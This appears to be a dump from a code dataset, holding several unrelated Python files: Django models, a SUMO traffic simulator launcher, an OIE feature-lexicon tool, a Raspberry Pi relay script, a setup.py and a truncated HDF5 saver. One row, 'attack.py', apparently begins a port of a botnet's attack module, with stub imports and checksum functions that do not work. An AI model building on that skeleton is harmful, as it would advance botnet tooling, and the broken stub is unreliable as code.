index int64 0 1,000k | blob_id stringlengths 40 40 | code stringlengths 7 10.4M |
|---|---|---|
400 | 68f3d3fce52d08381adc522ee032ef3181aec82a | # Generated by Django 2.2.3 on 2019-07-27 10:41
from django.db import migrations, models
class Migration(migrations.Migration):
    """Auto-generated Django migration (2.2.3): relaxes Beer.rating to an
    optional FloatField (blank=True, null=True)."""

    dependencies = [
        # Must run after the previous beerFriends migration.
        ('beerFriends', '0006_auto_20190726_1504'),
    ]

    operations = [
        migrations.AlterField(
            model_name='beer',
            name='rating',
            field=models.FloatField(blank=True, null=True),
        ),
    ]
|
401 | 4775bef3623497e9bbe79ca2d4e9e9da0422c450 | #
#
#
# ------------------------------------------------------------------------------------------------------------------------------
#
# This program has been developed by Hamed Noori and, with citation of the related publications,
# can be used without permission.
# This program is for a novel architecture for traffic light control system which can form and manipulate
# vehicular platoons using clusters of traffic lights. This method, called Platoon-Based Intelligent Traffic Lights (PB-ITL)
# is based on coordinated traffic lights that are connected and are also able to communicate with vehicles wirelessly. PB-ITL
# groups traffic lights in clusters and each cluster tries to provide proper green status for the platoon of vehicles, using the
# Platooning concept which is seeking to utilize close to full capacity of roads.
# This lib is a Python-based program which can simulate a city with dynamic intelligent traffic lights.
# The author can be reached at noori@ece.ubc.ca
#
# ------------------------------------------------------------------------------------------------------------------------------
#
#
def start_simulation(sumo, scenario, network, begin, end, interval, output):
    """Launch SUMO as a TraCI server on a free port and run the simulation.

    :param sumo: unused on entry; rebound to the spawned SUMO subprocess
    :param scenario: unused here -- kept for interface compatibility
    :param network: network description forwarded to run()
    :param begin: simulation start time, forwarded to run()
    :param end: simulation end time, forwarded to run()
    :param interval: reporting/step interval, forwarded to run()
    :param output: path for SUMO's --tripinfo-output file
    """
    logging.debug("Finding unused port")
    unused_port_lock = UnusedPortLock()
    unused_port_lock.__enter__()
    remote_port = find_unused_port()
    logging.debug("Port %d was found" % remote_port)
    logging.debug("Starting SUMO as a server")
    # NOTE(review): hard-coded Windows placeholder paths; the original had a
    # stray third backslash in "D:\\\PATH" which is normalized here. Replace
    # both paths with the real sumo-gui.exe and .sumo.cfg locations.
    sumo = subprocess.Popen(
        ["D:\\PATH\\sumo-gui.exe", "-c", "D:\\PATH\\Your.sumo.cfg",
         "--tripinfo-output", output,
         "--device.emissions.probability", "1.0",
         "--remote-port", str(remote_port)],
        stdout=sys.stdout, stderr=sys.stderr)
    unused_port_lock.release()
    try:
        traci.init(remote_port)
        run(network, begin, end, interval)
    except Exception:
        logging.exception("Something bad happened")
    finally:
        # Bug fix: logging.exception() is only meaningful inside an except
        # block (it logs a traceback); use a plain message for shutdown.
        logging.info("Terminating SUMO")
        terminate_sumo(sumo)
        unused_port_lock.__exit__()
|
402 | 8102bdf4d29d2d3a1bdddbcfb6045b0660693996 | import os
import time
import argparse
import cPickle as pickle
from definitions import OieFeatures
from definitions.OieExample import OieExample
class FeatureLexicon:
    """
    Container for the dictionaries that index mined features.

    Holds two parallel numbering schemes:

    * the *full* lexicon -- ``str2Id``/``id2Str`` map every extracted feature
      string (of the form ``'featDef#value'``, e.g. ``'bigrams#e1_t2'``) to a
      numeric ID and back, while ``id2freq`` counts how often each ID was seen
      (only ``get_or_add`` updates the counts);
    * the *pruned* lexicon -- ``str2IdPruned``/``id2StrPruned`` hold only the
      features whose frequency passed an external threshold.
    """

    def __init__(self):
        # next free ID in the full lexicon
        self.nextId = 0
        self.id2Str = {}        # int -> feature string
        self.str2Id = {}        # feature string -> int
        self.id2freq = {}       # int -> occurrence count (updated by get_or_add only)
        # next free ID in the pruned lexicon
        self.nextIdPruned = 0
        self.id2StrPruned = {}  # int -> feature string (thresholded)
        self.str2IdPruned = {}  # feature string -> int (thresholded)

    def get_or_add(self, s):
        """
        Return the ID of *s* in the full lexicon, registering it first if
        needed, and bump its frequency count by one.

        :param s: feature string, e.g. ``'posPatternPath#JJ_VV_NN'``
        :return: integer ID of *s*
        """
        known = self.str2Id.get(s)
        if known is None:
            known = self.nextId
            self.id2Str[known] = s
            self.str2Id[s] = known
            self.id2freq[known] = 1
            self.nextId += 1
        else:
            self.id2freq[known] += 1
        return known

    def get_or_add_pruned(self, s):
        """
        Return the ID of *s* in the pruned lexicon, registering it first if
        needed. Frequencies are not touched here.

        :param s: feature string assumed to have passed the threshold
        :return: integer ID of *s* in the pruned lexicon
        """
        if s in self.str2IdPruned:
            return self.str2IdPruned[s]
        fresh = self.nextIdPruned
        self.id2StrPruned[fresh] = s
        self.str2IdPruned[s] = fresh
        self.nextIdPruned = fresh + 1
        return fresh

    def get_id(self, a_string):
        """
        :param a_string: a feature string such as ``'bigrams#e1_t1'``
        :return: its ID in the full lexicon, or None if unknown
        """
        return self.str2Id.get(a_string)

    def get_str(self, idx):
        """
        :param idx: a numeric ID from the full lexicon
        :return: the feature string for *idx*, or None if unknown
        """
        return self.id2Str.get(idx)

    def get_str_pruned(self, idx):
        """
        :param idx: a numeric ID from the pruned lexicon
        :return: the feature string for *idx*, or None if unknown
        """
        return self.id2StrPruned.get(idx)

    def get_freq(self, idx):
        """
        :param idx: a numeric ID from the full lexicon
        :return: how many times the feature was seen, or None if unknown
        """
        return self.id2freq.get(idx)

    def get_feature_space_dimensionality(self):
        """
        :return: number of unique features that passed the threshold
        """
        return self.nextIdPruned
def build_feature_lexicon(raw_features, feature_extractors, lexicon):
# invokes internally get_or_add building the str2Id, id2Str, id2freq dicts since expand parameter is True
print 'Building feature lexicon...'
for ex_f in raw_features:
get_features(lexicon, feature_extractors, [ex_f[1], ex_f[4], ex_f[5], ex_f[7], ex_f[8], ex_f[6]], ex_f[2], ex_f[3], expand=True)
print ' Lexicon now has {} unique entries'.format(lexicon.nextId)
def get_features(lexicon, feature_extractors, info, arg1=None, arg2=None, expand=False):
    """Extract features for one datapoint and return their numeric IDs.

    Each extractor is applied to (info, arg1, arg2); a None result is
    skipped, otherwise every produced value is keyed as
    '<extractor name>#<value>' and resolved through the lexicon.

    :type lexicon: FeatureLexicon
    :param feature_extractors: callables f(info, arg1, arg2) -> value, list
        of values, or None (as defined in OieFeatures.py)
    :param info: per-sentence fields, in order: parsing path, entity-type
        pair, trigger, sentence, POS sequence, document path
    :param arg1: first entity string, e.g. 'Java'
    :param arg2: second entity string, e.g. 'C++'
    :param expand: when True, unseen features are added to the lexicon
        (updating str2Id/id2Str/id2freq); when False, unseen features are
        silently dropped
    :return: list of integer feature IDs
    """
    feature_ids = []
    for extractor in feature_extractors:
        extracted = extractor(info, arg1, arg2)
        if extracted is None:
            continue
        prefix = extractor.__name__ + "#"
        for element in generate_feature_element(extracted):
            _load_features(lexicon, prefix + element, feature_ids, expand=expand)
    return feature_ids
def get_thresholded_features(lexicon, feature_extractors, info, arg1, arg2, threshold, expand=False):
    """Extract features for one datapoint, keeping only frequent ones.

    Mirrors get_features(), but routes every feature string through
    _load_thresholded_features so that only features whose global frequency
    exceeds *threshold* contribute an ID (taken from the pruned lexicon).

    :type lexicon: FeatureLexicon
    :param feature_extractors: callables f(info, arg1, arg2) -> value, list
        of values, or None (as defined in OieFeatures.py)
    :param info: per-sentence fields, in order: parsing path, entity-type
        pair, trigger, sentence, POS sequence, document path
    :param arg1: first entity string, e.g. 'Java'
    :param arg2: second entity string, e.g. 'C++'
    :param threshold: cut-off; a feature must have been seen more than this
        many times to be kept
    :param expand: whether the pruned dictionaries may grow
    :type expand: bool
    :return: list of integer feature IDs from the pruned lexicon
    """
    feature_ids = []
    for extractor in feature_extractors:
        extracted = extractor(info, arg1, arg2)
        if extracted is None:
            continue
        prefix = extractor.__name__ + "#"
        for element in generate_feature_element(extracted):
            _load_thresholded_features(lexicon, prefix + element, feature_ids, threshold, expand=expand)
    return feature_ids
def generate_feature_element(extractor_output):
    """Yield the individual feature values from an extractor's output.

    Extractors may return either a single value or a list of values; this
    normalizes both cases into one iterable.

    :param extractor_output: a single feature value or a list of them
    """
    # Idiom fix: isinstance() instead of type(...) == list; also accepts
    # list subclasses. Non-list values (including tuples, matching the
    # original behavior) are yielded as a single element.
    if isinstance(extractor_output, list):
        for element in extractor_output:
            yield element
    else:
        yield extractor_output
def _load_features(lexicon, feat_str_id, feats, expand=False):
if expand:
feats.append(lexicon.get_or_add(feat_str_id))
else:
feat_id = lexicon.get_id(feat_str_id)
if feat_id is not None:
feats.append(feat_id)
def _load_thresholded_features(lexicon, feat_str_id, feats, thres, expand=False):
if expand:
if lexicon.id2freq[lexicon.get_id(feat_str_id)] > thres:
feats.append(lexicon.get_or_add_pruned(feat_str_id))
else:
feat_id = lexicon.get_id(feat_str_id)
if feat_id is not None:
if lexicon.id2freq[feat_id] > thres:
feats.append(lexicon.get_or_add_pruned(feat_str_id))
def read_examples(file_name):
"""
Reads the input tab-separated (\\\\t) file and returns the parsed data as a list of lists of strings. Each line, of the file to read, corresponds to a datapoint and has as many entries as the number of elements of the list returned by definitions.OieFeatures.getBasicCleanFeatures plus one.
Raises and IOError if a line found in the input file does not have 9 elements. The returned lists are of the form:\n
['counter_index', 'entry_1', 'entry_2', .., 'entry_9']\n
A sample file with the required format is '../data-sample.txt'.\n
:param file_name: a file path to read from
:type file_name: str
:return: of lists of strings. Each inner list has as first element a counter 0..N followed by the entries found in a line
returned by definitions.OieFeatures.getBasicCleanFeatures corresponding to the ones in the input file
:rtype: list
"""
start = time.time()
print 'Reading examples from tab separated file...'
count = 0
i = 0
with open(file_name, 'r') as fp:
relation_examples = []
for i, line in enumerate(fp):
line.strip()
if len(line) == 0 or len(line.split()) == 0:
raise IOError
else:
fields = line.split('\t')
assert len(fields) == 9, "a problem with the file format (# fields is wrong) len is " + str(len(fields)) + "instead of 9"
relation_examples.append([str(count)] + fields)
count += 1
print ' File contained {} lines'.format(i + 1)
print ' Datapoints with valid features encoded: {}'.format(count)
print ' Done in {:.2f} sec'.format(time.time() - start)
return relation_examples
def load_features(raw_features_struct, lexicon, examples_list, labels_dict, threshold):
    """
    Encodes the input raw feature values into OieExample objects and appends
    them to *examples_list*; fills *labels_dict* with the goldstandard label
    tokens of each example. As a side effect the lexicon's pruned
    ('thresholded') dictionaries grow via get_thresholded_features.

    .. seealso:: :funct:`read_examples` -- typically produces the input
       structure.

    :param raw_features_struct: list of lists of strings; each inner row is
        [counter, parsing, entity1, entity2, entity-type pair, trigger,
        docPath, sentence, POS sequence, label]
    :type raw_features_struct: list of lists of strings
    :param lexicon: lexicon whose pruned mappings are updated
    :type lexicon: FeatureLexicon
    :param examples_list: list to populate with definitions.OieExample objects
    :type examples_list: list
    :param labels_dict: dict to fill; example index (int) => label tokens (list of str)
    :type labels_dict: dict
    :param threshold: a feature must occur more than this many times to be kept
    :type threshold: int
    """
    # NOTE(review): time.clock() was removed in Python 3.8 -- this module is
    # Python 2 code (print statements, cPickle); confirm before porting.
    start = time.clock()
    print "Creating training examples and putting into list structure..."
    index = 0
    # NOTE(review): 'feat_extractors' below is the module-level global set in
    # the __main__ block, not a parameter -- importing and calling this
    # function from elsewhere raises NameError; confirm intent.
    for i, feats in enumerate(raw_features_struct):  # a list of lists of strings [[0, f1, f2, .., f9], [1, ..], .., [N, ..]]
        feat_ids = get_thresholded_features(lexicon, feat_extractors,
            [feats[1], feats[4], feats[5], feats[7], feats[8], feats[6]], feats[2], feats[3], expand=True,
            threshold=threshold)
        example = OieExample(feats[2], feats[3], feat_ids, feats[5], relation=feats[9])
        # last field is the goldstandard label; stored as a list of tokens
        labels_dict[index] = feats[-1].strip().split(' ')
        index += 1
        examples_list.append(example)
    print ' Unique thresholded feature keys: {}'.format(lexicon.nextIdPruned)
    print ' Done in {:.1f} sec'.format(time.clock() - start)
def pickle_objects(feat_extrs, feat_lex, dataset_splits, goldstandard_splits, a_file):
    """Pickles the input objects, in order, into the specified file.

    The four objects are dumped sequentially into one file, so
    unpickle_objects() must read them back in the same order.

    :param feat_extrs: feature extractors
    :type feat_extrs: list of callable objects
    :param feat_lex: indexed feature values extracted from mined sentences
    :type feat_lex: FeatureLexicon
    :param dataset_splits: maps split names to lists of examples
    :type dataset_splits: dict; str {'train', 'test', 'valid'} => list (of instances of definitions.OieExample)
    :param goldstandard_splits: the true relation labels per split
    :type goldstandard_splits: dict; str {'train', 'test', 'valid'} => dict (int => list of label tokens)
    :param a_file: the target file to pickle the objects to
    :type a_file: str
    """
    start = time.time()
    print 'Pickling feature extraction functions, feature lexicon, dataset_splits batch examples and goldstandard_splits labels...'
    # Shape checks before anything is written. NOTE(review): asserts are
    # stripped under python -O; these are sanity checks, not validation.
    assert type(feat_extrs) == list, 'Expected a list of callables as the 1st object to be pickled'
    for _ in feat_extrs:
        assert callable(_) is True, 'Element {} of 1st object is not callable'.format(_)
    assert isinstance(feat_lex, FeatureLexicon), "Expected an instance of FeatureLexicon as the 2nd object to be pickled. Got '{}' instead".format(type(feat_lex))
    assert type(dataset_splits) == dict, 'Expected a dict as the 3rd object to be pickled'
    for _ in dataset_splits:
        assert _ in ['train', 'test', 'valid'], "The dict expected as the 3rd object to be pickled, has key '{}' not in ['train', 'test', 'valid']".format(_)
    assert type(goldstandard_splits) == dict, 'Expected a dict as the 4th object to be pickled'
    for _ in goldstandard_splits:
        assert _ in ['train', 'test', 'valid'], "The dict expected as the 4th object to be pickled, has key '{}' not in ['train', 'test', 'valid']".format(_)
    with open(a_file, 'wb') as pkl_file:
        pickle.dump(feat_extrs, pkl_file, protocol=pickle.HIGHEST_PROTOCOL)
        pickle.dump(feat_lex, pkl_file, protocol=pickle.HIGHEST_PROTOCOL)
        pickle.dump(dataset_splits, pkl_file, protocol=pickle.HIGHEST_PROTOCOL)
        pickle.dump(goldstandard_splits, pkl_file, protocol=pickle.HIGHEST_PROTOCOL)
    print ' Done in {:.2f} sec'.format(time.time() - start)
def unpickle_objects(a_file, verbose=False, debug=False):
    """
    Unpickles the input file and returns references to the retrieved objects.
    Objects must have been pickled in this order (as done by pickle_objects):\n
    * list: callable feature extraction functions
    * FeatureLexicon: the 5 ID/feature/frequency dictionaries
    * dict: split name => list of definitions.OieExample instances
    * dict: split name => dict mapping int IDs to lists of label tokens\n
    :param a_file: file containing pickled objects
    :type a_file: str
    :param verbose: prints informative messages
    :type verbose: bool
    :param debug: if true prints the type of each object loaded
    :type debug: bool
    :return: references to the unpickled objects
    :rtype: list, FeatureLexicon, dict, dict
    """
    start = time.time()
    with open(a_file, 'rb') as pkl_file:
        if verbose:
            print "Opened pickled file '{}'".format(a_file)
        # The four pickle.load calls must mirror pickle_objects' dump order.
        feature_extraction_functions = pickle.load(pkl_file)
        if debug:
            print "Loaded object of type '{}'".format(type(feature_extraction_functions).__name__)
        assert type(feature_extraction_functions) == list
        the_relation_lexicon = pickle.load(pkl_file)
        if debug:
            print "Loaded object of type '{}'".format(type(the_relation_lexicon).__name__)
        assert isinstance(the_relation_lexicon, FeatureLexicon), "Expected an instance of FeatureLexicon as the 2nd object to be pickled. Got '{}' instead".format(type(the_relation_lexicon))
        the_dataset = pickle.load(pkl_file)
        if debug:
            print "Loaded object of type '{}'".format(type(the_dataset).__name__)
        assert type(the_dataset) == dict
        the_goldstandard = pickle.load(pkl_file)
        if debug:
            print "Loaded object of type '{}'".format(type(the_goldstandard).__name__)
        assert type(the_goldstandard) == dict
        if verbose:
            print ' loaded feature extractors:', ', '.join(("'" + str(_.__name__) + "'" for _ in feature_extraction_functions))
            print ' loaded dataset with {} splits'.format(', '.join(("'" + _ + "'" for _ in the_dataset.iterkeys())))
    print 'Done in {:.2f} sec'.format(time.time() - start)
    return feature_extraction_functions, the_relation_lexicon, the_dataset, the_goldstandard
def get_cmd_arguments():
    """Build the argument parser and return the parsed command-line options."""
    parser = argparse.ArgumentParser(
        description='Processes an Oie file and add its representations to a Python pickled file.')
    parser.add_argument('input_file', metavar='input-file',
                        help='input file in the Yao format, like data-sample.txt')
    parser.add_argument('pickled_dataset', metavar='pickled-dataset',
                        help='pickle file to be used to store output (created if empty)')
    parser.add_argument('--batch', metavar='batch-name', default="train", nargs="?",
                        help="name used as a reference in the pickled file, default is 'train'")
    parser.add_argument('--thres', metavar='threshold-value', default="0", nargs="?", type=int,
                        help='minimum feature frequency')
    parser.add_argument('--test-mode', action='store_true',
                        help='used for test files. If true the feature space is not expanded, so that previously unseen features are not added to the dicts')
    return parser.parse_args()
if __name__ == '__main__':
    # NOTE(review): t_start and the --test-mode flag are currently unused.
    t_start = time.time()
    args = get_cmd_arguments()
    # reads the tabbed separated file into a list of lists of strings, representing extracted features
    exs_raw_features = read_examples(args.input_file)
    feat_extractors = OieFeatures.getBasicCleanFeatures()  # list of callable feature extraction functions
    relation_lexicon = FeatureLexicon()
    dataset = {}  # dict mapping keys 'train', 'test', 'dev' to a list of OieExample instances
    # dict mapping each key 'train', 'test', 'dev' to a dictionary mapping int to a list of strings, representing goldstandard relation labels
    # each inner list contains the tokens that comprise the label (i.e. ['is-a']). Most are expected to have a single token.
    goldstandard = {}
    # If a pickle already exists, resume from it (this rebinds all four
    # objects above); otherwise a fresh pickle file is created at the end.
    if os.path.exists(args.pickled_dataset):
        feat_extractors, relation_lexicon, dataset, goldstandard = unpickle_objects(args.pickled_dataset)
    examples = []  # list of instances of definitions.OieExample
    relation_labels = {}  # dictionary mapping int to list of strings
    if args.batch in dataset:
        examples = dataset[args.batch]  # list of OieExamples for the 'batch_name' input split of the dataset
        # dict with the goldstandard labels (lists of token(s)) for the 'batch_name' input split of the dataset
        relation_labels = goldstandard[args.batch]
    else:
        # insert the input batch name as a key in the 'dataset' dict, mapping to an empty list (for now)
        dataset[args.batch] = examples
        # insert the input batch name as a key in the 'goldstandard' dict, mapping to an empty dict (for now)
        goldstandard[args.batch] = relation_labels
    # update statistics and mappings for given split
    build_feature_lexicon(exs_raw_features, feat_extractors, relation_lexicon)
    # update the dataset split and goldstandard mappings with the thresholded extractions
    # ('examples' and 'relation_labels' alias the entries inside dataset/goldstandard)
    load_features(exs_raw_features, relation_lexicon, examples, relation_labels, args.thres)
    pickle_objects(feat_extractors, relation_lexicon, dataset, goldstandard, args.pickled_dataset)
|
403 | d82412055affc96d634957c953a35ea69b7e702f | '''Turning on or off, toggling and checking the status' of a specific relay'''
#!/bin/env python3
from time import sleep
from gpiozero import LED
# The eight relay channels, driven as simple digital outputs via gpiozero.
# NOTE(review): the numbers appear to be BCM GPIO pin numbers (gpiozero's
# default numbering) -- confirm against the board wiring.
RELAYS = [
    LED(23),
    LED(24),
    LED(25),
    LED(8),
    LED(7),
    LED(1),
    LED(12),
    LED(16)
]
def on_action(relay_option, number):
    '''Switch the chosen relay on and announce it.'''
    relay_option.on()
    message = f"relay {number} is turning on"
    print(message)
def off_action(relay_option, number):
    '''Switch the chosen relay off and announce it.'''
    relay_option.off()
    message = f"relay {number} is turning off"
    print(message)
def toggle_action(relay_option, number):
    '''To toggle the chosen relay'''
    # NOTE(review): despite the name, this does not flip the current state;
    # it always pulses the relay on for 0.5 s then off for 0.5 s regardless
    # of its prior state (gpiozero's LED.toggle() would invert the state).
    # Confirm which behavior is intended. Total blocking time: ~1 second.
    print(f"relay {number} is toggling")
    relay_option.on()
    sleep(0.5)
    relay_option.off()
    sleep(0.5)
def print_help():
    '''Show usage information for the interactive relay prompts.'''
    usage = '''
Description
Arguments:
number number of relay 1 to 8
action on, off, or toggle
optional arguments:
h show this help message and exit
'''
    print(usage)
def options():
    '''Prompt for a relay number (or 'h' for help) and run one action on it.

    Reads one line from stdin: 'h' shows the help text; a number from 1-8
    selects a relay, whose status is printed before and after the chosen
    action; anything else reports an error. Always returns None.
    '''
    input_str = input("Which relay? ")
    if input_str == 'h':
        print_help()
        return
    # Bug fix: a non-numeric answer used to crash with ValueError on int();
    # it is now reported like an out-of-range index. The original also
    # wrapped this body in a dead 'while True' (every path returned).
    try:
        index = int(input_str) - 1
    except ValueError:
        print("index out of range")
        return
    if 0 <= index <= 7:
        relay_status(RELAYS[index], input_str)
        relay_action(RELAYS[index], input_str)
        relay_status(RELAYS[index], input_str)
    else:
        print("index out of range")
def relay_action(relay_number, num):
    '''Prompt for an action ('on', 'off' or 'toggle') and apply it to the relay.

    Re-prompts until a known action name is entered, then dispatches to the
    matching handler and returns its result (None).

    :param relay_number: the relay (gpiozero LED) to act on
    :param num: the relay's user-facing number, used in printed messages
    '''
    # Fix: the original re-prompted via unbounded recursion (inside a dead
    # 'while True' whose every path returned); a loop cannot blow the stack
    # on repeated bad input. Prompt/output sequence is unchanged.
    actions = {
        'on': on_action,
        'off': off_action,
        'toggle': toggle_action
    }
    while True:
        action = input("Which action? ")
        handler = actions.get(action)
        if handler is not None:
            return handler(relay_number, num)
        print("Try again")
def relay_status(relay_number, number):
    '''Report whether the given relay is currently on or off.'''
    state = "on" if relay_number.value == 1 else "off"
    print(f"relay {number} is {state}")
# Interactive main loop: prompt for a relay and action once per second.
# Runs forever; stop with Ctrl-C.
while True:
    options()
    sleep(1)
|
404 | 862b529741d9c3e6cf7ca50272c8af724c56ac62 | from wasserstoff.wasserstoff import Config, Environment
__all__ = ['Config', 'Environment']
|
405 | 6d25b0fedf0d5081a3a0a93ddacc49748464d9d0 | # Required python libraries for attack.py
import socket
import os
import sys
from termcolor import colored
import StringIO
import time
# need to find Python equivalent libraries for these
import stdio
import stdlib
import unistd
# need to find Python equivalent libraries for these
import includes
import killer
import main
import protocol
import rand
import resolv
import scanner
import table
import util
def checksum_tcp_udp(ip_header, buffer_name, data_length, lenth):
    # NOTE(review): unimplemented stub -- 'sum_checksum_tcp_udp' is not
    # defined anywhere in view, so calling this raises NameError. Presumably
    # a placeholder for a TCP/UDP checksum routine being ported from C
    # (see the C-header-style imports above). 'lenth' looks like a typo for
    # 'length' -- confirm before relying on the signature.
    return sum_checksum_tcp_udp
def checksum_generic(address, count):
    # NOTE(review): unimplemented stub -- 'sum_checksum_generic' is not
    # defined anywhere in view, so calling this raises NameError. Presumably
    # a placeholder for a generic IP checksum routine ported from C.
    return sum_checksum_generic
|
406 | e57b30a7a1cf987918abfb3cb7d612bdead2ddcd | from django.db import models
# Create your models here.
class Airlines(models.Model):
    """A scheduled flight: route, times and base fare."""
    flight_number=models.CharField(max_length=8,unique=True)  # unique flight code
    airlines_id=models.CharField(max_length=10)  # carrier identifier
    source=models.CharField(max_length=20)  # departure location name
    destination=models.CharField(max_length=20)  # arrival location name
    departure=models.TimeField()  # time of day only -- no date component
    arrival=models.TimeField()
    base_price=models.DecimalField(decimal_places=2,max_digits=10)  # fare before extras

    def __str__(self):
        """Use the flight number as the human-readable representation."""
        return self.flight_number
class Users(models.Model):
    """A registered user account.

    NOTE(review): 'password' is a plain CharField with no hashing in view --
    consider django.contrib.auth instead of storing raw passwords.
    'phone_number' as IntegerField drops leading zeros and cannot hold
    symbols like '+'; a CharField is the usual choice -- confirm intent.
    """
    user_id=models.CharField(max_length=16)
    email=models.EmailField(max_length=50,unique=True)  # unique contact/login address
    password=models.CharField(max_length=20)
    phone_number=models.IntegerField()
    gender=models.CharField(max_length=10)

    def __str__(self):
        """Identify the user by email."""
        return self.email
class Bookings(models.Model):
    """A booking joining a user to a flight."""
    booking_id=models.AutoField(primary_key=True)  # surrogate key
    # deleting a user cascades to their bookings
    email=models.ForeignKey(Users,on_delete=models.CASCADE)
    # NOTE(review): default='00000' must match an existing Airlines primary
    # key to be usable; editable=True is already the default -- confirm intent.
    flight_num=models.ForeignKey(Airlines,on_delete=models.CASCADE,default='00000',editable=True)
|
407 | 2827a56c12c1e15a6fe26ce182aa07d76735d77f | '''
MDSANIMA Setup
'''
import sys
import pathlib
from setuptools import setup, find_packages
# Packaging script for the 'mdsanima' render-time calculator package.
HERE = pathlib.Path(__file__).parent

# Refuse to install on interpreters older than the supported minimum.
CURRENT_PYTHON = sys.version_info[:2]
REQUIRED_PYTHON = (3, 6)

# This check and everything above must remain compatible with Python 2.7.
if CURRENT_PYTHON < REQUIRED_PYTHON:
    sys.stderr.write("""==========================
Unsupported Python Version
==========================
This version of MDSANIMA requires Python {}.{}
but you're trying to install it on Python {}.{}
""".format(*(REQUIRED_PYTHON + CURRENT_PYTHON)))
    sys.exit(1)

# Package metadata.
VERSION = '0.2.0'
PACKAGE_NAME = 'mdsanima'
AUTHOR = 'Marcin Rozewski'
AUTHOR_EMAIL = 'marcinrozewski@gmail.com'
URL = 'https://github.com/mdsanima/mdsanima'
LICENSE = 'MIT'
DESCRIPTION = 'The package contains modules that will help in calculating rendering time.'
LONG_DESCRIPTION = (HERE / "README.rst").read_text()
LONG_DESC_TYPE = "text/x-rst"

INSTALL_REQUIRES = [
    'humanfriendly'
]

KEYWORDS = [
    'mdsanima',
    'render time',
    'calculator render time',
    'blender',
    'blender3d',  # typo fix: was 'blener3d'
    'rendering',
    'houdini',
    'sidefx',
    'vfx',
    'cinema4d',
    'cycles',
    'redshift',
    'render engine',
    'octane render',
    'mantra',
    'vray',
    'clarisse ifx'
]

setup(name=PACKAGE_NAME,
      version=VERSION,
      description=DESCRIPTION,
      long_description=LONG_DESCRIPTION,
      long_description_content_type=LONG_DESC_TYPE,
      author=AUTHOR,
      license=LICENSE,
      author_email=AUTHOR_EMAIL,
      url=URL,
      install_requires=INSTALL_REQUIRES,
      packages=find_packages(),
      extras_require={
          "docs": [
              'sphinx',
              'sphinx-autoapi',
              'sphinx-rtd-theme',
              'sphinx-bootstrap-theme',
              'sphinx-prompt',
              'sphinx-tabs',
              'recommonmark'
          ],
      },
      python_requires='>=3.6',
      keywords=KEYWORDS,
      # Consistency fix: the 'Python :: 3.5' classifier contradicted
      # python_requires='>=3.6' and has been removed.
      classifiers=[
          'Development Status :: 5 - Production/Stable',
          'Environment :: Console',
          'Intended Audience :: Developers',
          'License :: OSI Approved :: MIT License',
          'Natural Language :: English',
          'Operating System :: POSIX :: Linux',
          'Operating System :: Microsoft :: Windows :: Windows 10',
          'Operating System :: MacOS',
          'Programming Language :: Python :: 3',
          'Programming Language :: Python :: 3.6',
          'Programming Language :: Python :: 3.7',
          'Topic :: Multimedia :: Graphics :: 3D Rendering',
          'Topic :: Multimedia :: Graphics :: 3D Modeling',
      ],
      )
408 | d4ac5c6f08e9baa458fbe0ca7aa90c4d9372844f | import h5py
import numpy as np
#import tracking
dt = h5py.special_dtype(vlen=bytes)
def stringDataset(group, name, data, system=None):
    """Create a length-1 variable-length-bytes dataset holding *data*.

    When *system* is truthy it is attached as the dataset's 'system'
    attribute. Returns the created dataset.
    """
    dset = group.create_dataset(name, (1,), dtype=dt, data=data)
    if system:
        addSystemAttribute(dset, system)
    return dset
def addStringAttribute(dset_or_group, name, data):
    """Set attribute *name* on an h5py dataset/group, UTF-8 encoded."""
    dset_or_group.attrs[name] = bytes(data, 'utf-8')
def addSystemAttribute(dset_or_group, data):
    """Shortcut for storing *data* under the conventional 'system' attribute."""
    return addStringAttribute(dset_or_group, 'system', data)
def add_dataset(group, name, data, system=None, dtype=None):
    """Create a dataset *name* under *group* and return it.

    Strings are routed through stringDataset (variable-length bytes);
    everything else goes straight to create_dataset, with an explicit dtype
    when one is given. A truthy *system* is attached as the 'system'
    attribute.
    """
    if type(data) is str:
        return stringDataset(group, name, data, system)
    kwargs = {'data': data}
    if dtype:
        kwargs['dtype'] = dtype
    dset = group.create_dataset(name, **kwargs)
    if system:
        addSystemAttribute(dset, system)
    return dset
def saveH5Recursive(h5_filename, data_dict):
    """Recursively write a (possibly nested) dict of data into an HDF5 file.

    Dicts become groups; leaves become datasets via add_dataset. BeamProfile
    and ScreenDistribution instances are converted through their to_dict()
    first; tuples are stored as dicts keyed 'tuple_0', 'tuple_1', ...;
    None becomes the string 'None'. Errors on individual entries are printed
    and skipped so one bad value does not abort the whole save.

    :param h5_filename: path of the HDF5 file to create (overwritten)
    :param data_dict: mapping of top-level names to values or sub-dicts
    """
    # import here to prevent circular import
    try:
        import tracking
    except ImportError:
        from . import tracking

    def recurse_save(group, dict_or_data, dict_or_data_name, new_group=None):
        if dict_or_data is None:
            dict_or_data = 'None'
        if group is None:
            print("'recurse_save' has been called with None")
            raise ValueError
        if type(dict_or_data) is tracking.BeamProfile or type(dict_or_data) is tracking.ScreenDistribution:
            dict_or_data = dict_or_data.to_dict()
        if type(dict_or_data) is tuple:
            # Bug fix: the key was the literal 'tuple_%i' (never formatted
            # with i), so every tuple collapsed into a single entry.
            dict_or_data = {'tuple_%i' % i: x for i, x in enumerate(dict_or_data)}
        if type(dict_or_data) is dict:
            # (removed a dead 'inner_key = str(...)' assignment that was
            # never used in this branch)
            try:
                new_group = group.create_group(dict_or_data_name)
            except Exception as e:
                print(e)
                print(dict_or_data_name, 'error')
            if new_group is None:
                raise ValueError
            for key, val in dict_or_data.items():
                try:
                    recurse_save(new_group, val, key)
                except ValueError as e:
                    print(e)
                    print('I called recurse_save with None')
        else:
            mydata = dict_or_data
            inner_key = dict_or_data_name
            if type(mydata) is str:
                add_dataset(group, inner_key, mydata.encode('utf-8'), 'unknown')
            elif (type(mydata) is list and type(mydata[0]) is str) or (hasattr(mydata, 'dtype') and mydata.dtype.type is np.str_):
                # Lists/arrays of strings need fixed-size ASCII storage.
                try:
                    # Bug fix: np.str (alias removed in NumPy >= 1.24)
                    # replaced by np.str_, matching the check above.
                    if hasattr(mydata, 'dtype') and mydata.dtype.type is np.str_ and len(mydata.shape) == 2:
                        mydata = mydata.flatten()
                    if len(mydata.shape) == 2:
                        new_list = [[n.encode('ascii') for n in arr] for arr in mydata]
                        max_str_size = max(max(len(n) for n in arr) for arr in mydata)
                    elif len(mydata.shape) == 1:
                        new_list = [n.encode('ascii') for n in mydata]
                        max_str_size = max(len(n) for n in mydata)
                    elif len(mydata.shape) == 0:
                        new_list = [mydata.encode('ascii')]
                        max_str_size = len(new_list[0])
                    dset = group.create_dataset(inner_key, mydata.shape, 'S%i' % max_str_size, new_list)
